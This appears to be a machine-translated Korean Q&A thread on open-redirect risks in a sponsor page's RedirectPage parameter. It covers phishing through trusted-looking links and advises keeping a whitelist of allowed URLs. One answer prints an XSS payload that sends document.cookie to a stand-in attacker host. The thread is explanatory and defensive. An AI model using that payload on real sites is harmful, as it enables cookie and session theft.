2008-10-17 4 views
2

웹 보안 문제는 여기에서 찾을 수 있습니까?

다음과 같은 다른 웹 페이지로 리디렉션되는 웹 페이지가 있습니다.

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html 

그러면 Sponsor.php 페이지에 전달 된 RedirectPage로 연결되는 "계속 페이지"로 연결되는 링크가있는 광고가 표시됩니다. 이로 인해 발생할 수있는 보안/스푸핑 문제가 있습니까? 이것을 처리하는 가장 좋은 방법은 무엇입니까? (사용자가 두 사이트 중 하나에 로그인하지 않은 것에 유의하십시오.)

+0

두 사이트 중 어디에도 로그인하지 않으면 보안상의 문제가 없습니다. – NotMe

답변

10

큰 문제입니다. 나는 당신이처럼 보이는 링크를 보낼 경우 :

http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14 

을 당신은 "아, CNN, 즉 합법적 인 사이트이다", 당신이 그것을 열고 '페이지에 계속'을 클릭 거라고 생각하는거야 링크. 그리고 그물에 가장 예쁜 포르노 사이트 중 하나에 올거야, 너의 동료들에게 알리는 거대한 남자 목소리가 들릴거야. "나는 너를 원해! @ $ @ # $ 너! (& 내가 ⌐ ¡ 수 없을 때까지 ¤ &^$의 §^(#! ~ & $^#! @ $! "당신은 당신의 상사에게 설명해야합니다"나는 CNN 줄 알았는데! "

구멍은 여기.이 같은 블라인드 리디렉션 위험하다.

명성입니다 그리고 그. 어떻게 이것에 대해? 한 구멍의

http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie 

이제 사이트를 XSS 처리하고 사용자의 쿠키를 도용했습니다. 물론, 로그인 정보는 없지만 세션 데이터는 어떻습니까? 나중에 로그인을 추가하거나 회사의 다른 사람이 사용자가 로그인 한 1 년 후이 페이지를 사용합니다.

+0

우수. :) abcd –

0

이것은 확실히 보안 상 위험 할 수 있습니다. 보안이 관련 될 때 URL 내 변수를 사용하지 않아야합니다.

아무것도 완전히 안전하지는 않지만,이는이 문제를 처리하는 더 나은 방법 : sponsor.php이 RedirectPage에 값을 허용하고 광고가 보증을 의미하거나가 있다고 생각하는 사람들을 격려 경우 http://www.webmasterworld.com/forum88/2910.htm

+0

호기심에서 벗어난 이유는 무엇입니까? 내가 물어 보는 이유는 OP가 위험에 처한 로그온 정보가 없다고 명시 적으로 말했기 때문입니다. – NotMe

0

을 피싱 공격의 일부로 여는 올바른 경로. 더 나쁜 것은 당신이 아마 그 공격으로부터 이익을 얻을 것이고, 그것은 아마도 사람들을 불쾌하게 만들 것입니다.

허용 된 URL (또는 따르는 패턴) 목록을 유지하면 문제를 방지하는 데 많은 도움이됩니다.